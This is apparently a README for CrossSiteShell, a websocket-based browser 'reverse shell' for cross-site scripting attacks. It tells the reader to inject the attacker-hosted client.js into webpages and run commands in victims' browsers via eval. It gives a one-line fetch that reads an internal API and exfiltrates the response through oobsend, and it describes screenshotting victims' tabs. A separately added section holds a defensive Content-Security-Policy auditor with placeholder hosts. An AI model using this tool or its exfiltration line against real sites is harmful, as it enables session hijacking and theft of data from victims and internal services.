A websocket-based reverse shell for XSS attacks.

Overview

CrossSiteShell

A JavaScript/Node.js "reverse shell" that makes it easier to interact with the victim's browser during XSS attacks.

Usage

Run the following commands to start up the server:

npm install
node server.js

Then import the script located at http(s)://yourserver/client.js in any webpage.

Asynchronous data exfiltration

By default, commands are executed through the eval function, which is not asynchronous. To overcome this, I created a callback function, window.oobsend(string), that sends data to the server asynchronously. Here's an example of how to use it to communicate with an internal API:

fetch('https://internalservice/api').then(x => x.text().then(oobsend))
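
On the defending side, a Content-Security-Policy can stop the three browser behaviours described so far: loading a script from a foreign origin, running commands through eval, and the WebSocket channel back to the server. The following added example, which is not part of CrossSiteShell, audits a CSP header for them; the hostnames and policies are constructed placeholders and the source matching is simplified.

```javascript
// Added defensive example (not CrossSiteShell code): would this CSP header stop
// the foreign script import, eval() execution and WebSocket channel?
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    if (name && !directives.has(name)) directives.set(name, sources); // first wins
  }
  return directives;
}

function sourceAllows(source, url, pageUrl) { // simplified: no ports, paths, nonces
  const target = new URL(url);
  if (source === '*') return true;
  if (source === "'self'") return target.hostname === new URL(pageUrl).hostname;
  if (source.startsWith("'")) return false; // 'none', nonces, hashes, keywords
  if (source.endsWith(':')) return target.protocol === source; // scheme source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/.exec(source);
  if (!m) return false;
  if (m[1] && target.protocol !== m[1] + ':') return false;
  return m[2].startsWith('*.')
    ? target.hostname.endsWith(m[2].slice(1))
    : target.hostname === m[2];
}

function allowed(directives, names, url, pageUrl) {
  const name = names.find(n => directives.has(n)); // most specific directive
  if (!name) return true; // no governing directive: nothing is restricted
  return directives.get(name).some(s => sourceAllows(s, url, pageUrl));
}

function auditCsp(header, pageUrl, scriptUrl, socketUrl) {
  const d = parseCsp(header || '');
  const scriptSrc = d.get('script-src') || d.get('default-src');
  return {
    externalScript: allowed(d, ['script-src-elem', 'script-src', 'default-src'], scriptUrl, pageUrl),
    evalAllowed: !scriptSrc || scriptSrc.includes("'unsafe-eval'"),
    webSocket: allowed(d, ['connect-src', 'default-src'], socketUrl, pageUrl),
  };
}

// Constructed sample values; every hostname is a placeholder.
const PAGE = 'https://app.example.test/profile';
const SCRIPT = 'https://collector.example.net/client.js';
const SOCKET = 'wss://collector.example.net/';
const WEAK = "default-src *; script-src * 'unsafe-inline' 'unsafe-eval'";
const STRICT = "default-src 'self'; script-src 'self'; connect-src 'self'";
console.log('weak  ', auditCsp(WEAK, PAGE, SCRIPT, SOCKET));
console.log('strict', auditCsp(STRICT, PAGE, SCRIPT, SOCKET));
```

A result with all three fields false means the policy blocks each step independently, so a single injection point no longer yields an interactive channel.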

Taking screenshots

By using the .ss command in the console, CrossSiteShell will attempt to take a screenshot of the victim's tab. This is achieved by importing another library (html2canvas) that converts the HTML/CSS into a canvas and saves its content as an image. The image should be saved to your disk after it is received.

HTTPS

HTTPS is not supported by default. I'd recommend using a reverse proxy such as nginx to redirect traffic to the script.
